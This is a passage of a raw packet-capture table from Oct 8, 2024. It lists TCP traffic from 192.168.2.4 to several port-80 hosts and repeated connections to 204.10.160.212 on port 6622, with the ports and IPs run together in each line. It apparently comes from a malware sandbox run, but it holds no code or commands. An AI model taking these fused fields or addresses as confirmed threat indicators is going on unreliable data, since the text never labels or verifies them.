                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933273077 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933561087 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933762074 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.933898926 CEST5027280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.938553095 CEST805027254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079114914 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079128981 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079190969 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079405069 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.079948902 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.080051899 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.081379890 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.081440926 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082323074 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082360983 CEST662250273204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082417965 CEST5027480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082417965 CEST502736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.082463980 CEST502736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.085582018 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.088620901 CEST805027418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.089472055 CEST662250273204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090543985 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090641975 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090770960 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.090797901 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.095849991 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.095952988 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.096436024 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.101742029 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.102083921 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.102083921 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.102125883 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.109657049 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.109764099 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.473803043 CEST502776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.478756905 CEST662250277204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.478827953 CEST502776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.483005047 CEST502776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.487915993 CEST662250277204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.411233902 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.412556887 CEST5027880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.695868015 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.695884943 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.695921898 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.695933104 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.695947886 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.695954084 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.695986986 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.696018934 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.696036100 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.696036100 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.696036100 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.697066069 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.697083950 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.697117090 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.697146893 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.698024035 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.698035002 CEST805027654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.698369980 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.699400902 CEST5027680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.957422018 CEST805027854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.958724976 CEST5027880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.972804070 CEST662250277204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.974713087 CEST502776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.983741045 CEST502776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.988264084 CEST5027580192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.988838911 CEST662250277204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.993566036 CEST805027535.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.002365112 CEST5027880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.002365112 CEST5027880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.007271051 CEST805027854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.007460117 CEST805027854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.029881001 CEST5027980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.035490036 CEST805027954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.035695076 CEST5027980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.041126966 CEST5027980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.041126966 CEST5027980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.046160936 CEST805027954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.046317101 CEST805027954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.364590883 CEST502806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.369493008 CEST662250280204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.369581938 CEST502806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.375922918 CEST502806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.382843971 CEST662250280204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.681957006 CEST805027854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.681974888 CEST805027854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.682090044 CEST5027880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.682190895 CEST5027880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.686927080 CEST805027854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.699513912 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.704543114 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.706697941 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.706906080 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.706906080 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.712105036 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.712121964 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.765960932 CEST805027954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.766083956 CEST805027954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.766252041 CEST5027980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.766252041 CEST5027980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.771130085 CEST805027954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.783832073 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.788978100 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.789323092 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.789323092 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.790632963 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.794444084 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.795649052 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.586879969 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.586896896 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.586967945 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.587052107 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.587307930 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.587377071 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589587927 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589660883 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589670897 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589679003 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589708090 CEST5028180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589751959 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.589802980 CEST5028280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.592400074 CEST805028144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.596503019 CEST805028234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.791800976 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.797059059 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.797322035 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.798497915 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.798497915 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.800338030 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.803545952 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.803572893 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.805294037 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.805632114 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.806186914 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.806186914 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.811289072 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.811902046 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.851380110 CEST662250280204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.851571083 CEST502806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.851655006 CEST502806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.856513023 CEST662250280204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.223740101 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.229124069 CEST662250285204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.230720043 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.234375000 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:25.239510059 CEST662250285204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.411655903 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.418353081 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896574020 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896588087 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896655083 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896655083 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896681070 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896692038 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896703005 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896712065 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896727085 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896778107 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896892071 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896914959 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896928072 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.896954060 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.897155046 CEST662250285204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.897169113 CEST805028318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.897211075 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.897212982 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.897222042 CEST5028380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.897262096 CEST502856622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.897407055 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.899092913 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.899194956 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.899338961 CEST5028480192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.901817083 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.901843071 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.906481981 CEST662250285204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.906567097 CEST805028447.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.906594038 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.906603098 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.962944984 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.968305111 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.968398094 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.969014883 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.969141006 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.974884033 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.975634098 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:27.255508900 CEST502886622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:27.370910883 CEST662250288204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:27.370995998 CEST502886622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:27.376398087 CEST502886622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:27.381333113 CEST662250288204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.685240030 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.685395956 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.685424089 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.685434103 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.685470104 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.685498953 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.685542107 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686332941 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686342955 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686358929 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686413050 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686455965 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686464071 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686511993 CEST5028780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686678886 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686728001 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.687231064 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.962610960 CEST662250288204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.962687969 CEST502886622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.962716103 CEST502886622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.962938070 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.962985992 CEST5028680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.965523005 CEST805028754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.967530012 CEST805028618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.968172073 CEST662250288204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.986454010 CEST5028980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.987066031 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.991820097 CEST80502893.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.991848946 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.991961002 CEST5028980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.991978884 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.992096901 CEST5028980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.992115974 CEST5028980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.992275000 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.992275000 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.997224092 CEST80502893.94.10.34192.168.2.4
